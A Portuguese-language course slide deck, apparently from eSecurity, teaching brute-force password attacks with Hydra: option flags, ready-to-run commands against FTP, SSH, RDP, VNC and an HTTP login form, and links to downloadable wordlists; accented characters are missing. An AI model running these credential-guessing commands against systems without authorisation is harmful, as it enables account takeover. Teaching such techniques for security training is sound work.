O que temos pra hoje?

Tcnicas de Invaso Brute Force

Temas de Hoje:

Brute Force

Conhecendo Hydra
Modos de Uso
Atacando Servios Padro
Atacando HTTP Post Form
Brinde! Wordlists grtis

Brute force com Hydra

Tcnicas de Invaso Brute Force

Hydra: Entendendo a ferramenta

Tcnicas de Invaso Brute Force

O Hydra descobre senha atravs de brute-force (tentativa e erro), ele busca

em wordlists, possveis usurios/senhas e vai testando as combinaes, uma a
uma.

O Hydra tem suporte aos servios Telnet, Formulrio HTTP/HTTPS, SSH, MySQL,
PostgreSQL, MSSQL, SMB, LDAP2 e LDAP3, FTP, SNMP, CVS,VNC, entre outros.
A ferramenta j vem toda instalada e configurada (inclusive com interface grfica)
no BackTrack, porm, caso no tenha instalado, basta fazer o download do cdigofonte e compil-la em qualquer distribuio.

Hydra: Entendendo a ferramenta

Tcnicas de Invaso Brute Force

Opes da ferramenta:
-l = Nome/login da vtima;
-L = Carrega uma lista contendo nomes/logins de vtimas (1 por linha);
-p = Especifica senha nica;
-P = Carrega uma lista com senhas (1 por linha);
-e = Adiciona 'n', testa senha em branco ou adicional 's' testa user como pass;
-C = Usado para carregar um arquivo contendo usurio:senha. Formato
usurio:senha equivale a - L/-P;
-M = Carrega lista de servidores alvos (1 por linha);
-o = Salva as senhas encontradas dentro do arquivo que voc especificar;
-f = Faz o programa parar de trabalhar quando a senha ou usurio for
encontrada[o];
-t = Limita o numero de solicitaes por vez (default: 16);
-w = Define o tempo mximo em segundos para esperar resposta do servidor
(default: 30s);
-v / -V = Modo verbose do programa. 'V' mostra todas tentativas.

Hydra: Modo de Uso

Tcnicas de Invaso Brute Force

Exemplos de uso:
Atacando servios de FTP:
# hydra -L wordlist -P wordlist -v 192.168.2.100 ftp
Atacando servios SSH:
# hydra -L wordlist -P wordlist -v 192.168.2.100 ssh
Atacando servios RDP:
# hydra -L wordlist -P wordlist -v 192.168.2.100 rdp
Atacando servios VNC:
# hydra -L wordlist -P wordlist -v 192.168.2.100 vnc

Atacando websites com usurio e senha:

# hydra -l teste -P wordlist 192.168.1.105 http-post-form
"/verificar.php:login=^USER^&senha=^PASS^:Login e senha incorretos"

Hydra: Modo de Uso

Tcnicas de Invaso Brute Force

Exemplos de uso:
Atacando servios de FTP:
# hydra -L wordlist -P wordlist -v 192.168.2.100 ftp -vV
Atacando servios SSH:
# hydra -L wordlist -P wordlist -v 192.168.2.100 ssh
Atacando websites com usurio e senha:
# hydra -l teste -P wordlist 192.168.1.105 http-post-form
"/verificar.php:login=^USER^&senha=^PASS^:Login e senha incorretos"

Brinde: Wordlists
Tcnicas de Invaso Brute Force

Seguem wordlists em Portugus e Ingls:

Dicionrio da Lingua Portuguesa retirada do BROffice:
# http://www.esecurity.com.br/blackhat2/wordlists/dicionario.txt
Dicinrio: Nomes masculinos e femininos (ENG):
# http://www.esecurity.com.br/blackhat2/wordlists/female-names.txt
# http://www.esecurity.com.br/blackhat2/wordlists/male-names.txt
# http://www.esecurity.com.br/blackhat2/wordlists/other-names.txt
Dicionrio com senhas comuns:
# http://www.esecurity.com.br/blackhat2/wordlists/senhas-comuns.txt
Dicionrio com palavras em Portugus + de 120.000 palavras:
# http://www.esecurity.com.br/blackhat2/wordlists/wordlist-ptbr.txt
# http://www.esecurity.com.br/blackhat2/wordlists/wordlist70k.txt

Dicionrio baseada nas contas mais comuns criadas no Linux:

# http://www.esecurity.com.br/blackhat2/wordlists/etc-hosts.txt

printf ("\Chega por hoje\n");

Tcnicas de Invaso Ataques redes Wifi

www.eSecurity.com.br

E-mail: alan.sanches@esecurity.com.br
Twitter: @esecuritybr e @desafiohacker
Skype: desafiohacker
Fanpage: www.facebook.com/academiahacker